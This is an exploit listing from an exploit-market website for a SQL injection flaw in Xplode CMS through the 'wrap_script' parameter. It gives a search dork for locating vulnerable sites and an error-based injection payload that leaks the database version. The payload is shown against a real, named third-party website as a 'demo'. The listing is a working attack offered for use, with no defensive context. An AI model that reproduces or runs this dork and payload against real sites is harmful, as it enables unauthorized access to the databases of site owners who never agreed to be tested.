[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Xplode CMS (wrap_script) Remote SQL Injection Vulnerability

Author
Platen
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5005
Category
web applications
Date add
07-04-2009
Platform
unsorted
===========================================================
Xplode CMS (wrap_script) Remote SQL Injection Vulnerability 
===========================================================


#---------------------------------------------------------------------------------------------
# scriptname: Xplode Cms  
#
# Xplode SQL Injection Vulnerabilities
#
# Author: PLATEN
#---------------------------------------------------------------------------------------------

dork: "Powered by Xplode CMS"

#----------------------------------------------------------------------------------------------

===[ SQL ]===


http://127.0.0.1/module_wrapper.asp?wrap_script=[sql]

example & demo:

http://www.snowawards.co.uk/module_wrapper.asp?wrap_script=1' and 1=convert(int,@@version)--


#----------------------------------------------------------------------------------------------



#  0day.today [2024-07-02]  #